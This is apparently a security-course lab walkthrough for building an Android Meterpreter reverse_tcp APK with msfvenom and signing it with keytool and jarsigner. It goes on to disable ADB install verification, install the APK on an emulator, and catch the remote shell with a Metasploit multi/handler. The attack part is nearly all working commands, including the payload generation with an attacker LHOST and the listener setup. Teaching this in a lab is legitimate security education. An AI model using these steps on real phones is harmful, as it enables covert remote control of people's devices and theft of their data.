If you are using a Debian virtual machine, adjust it to use Bridged networking.
ip a
Find your Debian machine's IP address,
highlighted in the upper right window
in the image below.
Open a Terminal on your host system and execute these commmands, replacing the IP address with the correct IP address of your Debian machine:
adb shell
ping 172.20.10.3
You should see replies, as shown
in the lower right window in the image below,
indicating that your Android emulator
can contact your Debian machine.
If you do not see replies, you must troubleshoot your networking before continuing with this project.
Press Ctrl+C to stop the pings.
sudo apt update
sudo apt install apktool curl wget gnupg2 android-tools-adb default-jdk
Accept any default install options.
Then execute these commands:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod +x msfinstall
./msfinstall
msfvenom -l payloads | grep android
There are only a few payloads available,
as shown below.
On Linux, execute this command to find your IP address.
ip a
When I did it, the address was 172.16.123.130,
as shown below.
On Linux, execute this command to generate the malware, replacing the IP address with your Linux systems IP address:
msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.123.130 -f raw -o happyfunball.apk
The malware is generated,
as shown below.
Execute this command:
keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
A prompt asks for a "keystore password". Enter
password twice.
Then a series of question asks for your name, etc. You can press Enter for each question except the last one, which you must answer yes to, as shown below.
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore happyfunball.apk alias_name
When you are prompted to, enter the
key store password of password
The app is signed, as shown below.
On your host system, execute these commands:
adb shell settings put global verifier_verify_adb_installs 0
adb install happyfunball.apk
The malware installs,
as shown below.
msfconsole -q
use multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 0.0.0.0
exploit
Metasploit begins listening on port 4444,
as shown below.
The monkey program simulates a user launching the app by tapping the interface on the phone.
adb shell monkey -p com.metasploit.stage -c android.intent.category.LAUNCHER 1
On your phone, a page appears asking for
permissions,
as shown below.
Click Continue. Click OK.
In your other Terminal window, a meterpreter shell opens, as shown below.
Flag M 410.1: Meterpreter Version (15 pts)
In the meterpreter shell, execute this command:The flag is the Meterpreter version, covered by a green rectangle in the image below.
sysinfo
Updated for new setup 10-31-22
default-jdk install added 4-24-24
Network test section and video added 4-25-24